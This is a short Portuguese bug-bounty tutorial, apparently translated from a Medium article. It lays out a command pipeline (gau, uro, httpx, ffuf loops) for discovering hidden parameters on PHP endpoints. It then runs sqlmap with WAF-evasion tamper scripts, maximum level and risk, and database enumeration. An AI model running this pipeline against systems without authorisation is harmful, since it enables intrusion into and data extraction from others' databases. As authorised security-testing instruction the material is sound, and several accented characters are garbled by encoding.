FUZZING PARA PARAMAIS ESCONDIDOS
Artigo: https://medium.com/@calfcrusher/fuzzing-for-hidden-params-671724bf3fd7
Olá amigos hackers, hoje eu quero mostrar a vocês um método para fuzz de params ocultos, especialmente em endpoints PHP.
$ cat subdomains.txt | gau --blacklist png,jpg,gif,jpeg,swf,woff,svg,pdf,tiff,tif,bmp,webp,ico,mp4,mov,js,css,eps,raw | tee all_urls.txt
2. Limpe os URLs e verifique o cĂłdigo de status http 200
$ cat all_urls.txt | uro | httpx -mc 200 -silencioso | tee live_urls.txt
3. Grep todos os endpoints php
$ cat live_urls.txt | grep “.php” | cut -f1 -d”?” | sed 's:/*$::' | sort -u > php_endpoints_urls.txt
4. Fuzz possĂveis parâmetros ocultos com ffuf
$ for URL in $(<php_endpoints_urls.txt); do (ffuf -u “${URL}?FUZZ=1” -w params_list.txt -mc 200 -ac -sa -t 20 -or -od ffuf_hidden_params_sqli_injections); done
$ for URL in $(<php_endpoints_urls.txt); do (ffuf -X POST -u “${URL}” -w params_list.txt -mc 200 -ac -sa -t 20 -or -od ffuf_hidden_params_sqli_injections -d “FUZZ=1”); done
Se vocĂŞ encontrou um parâmetro válido oculto, pode ser possĂvel que seja vulnerável Ă injeção de sql, entĂŁo a prĂłxima etapa será verificar esses parâmetros de URL que eles retornaram o cĂłdigo de status 200 com SQLMAP, assim:
$ sqlmap -u “URL” -- random-agent --tamper=”between,randomcase,space2comment” -v 2 --dbs --level 5 --risk 3 --batch
Encontrei alguns SQL Injection em programas VPD com este método :)
Você pode aplicar o mesmo método a arquivos .asp(x)
Para lista de parâmetros, tente isto:
https://github.com/Bo0oM/ParamPamPam/blob/master/params.txt
É claro que você pode gerar uma lista personalizada para o seu destino.
Experimente também https://github.com/s0md3v/Arjun um conjunto abrangente de descoberta de parâmetros HTTP.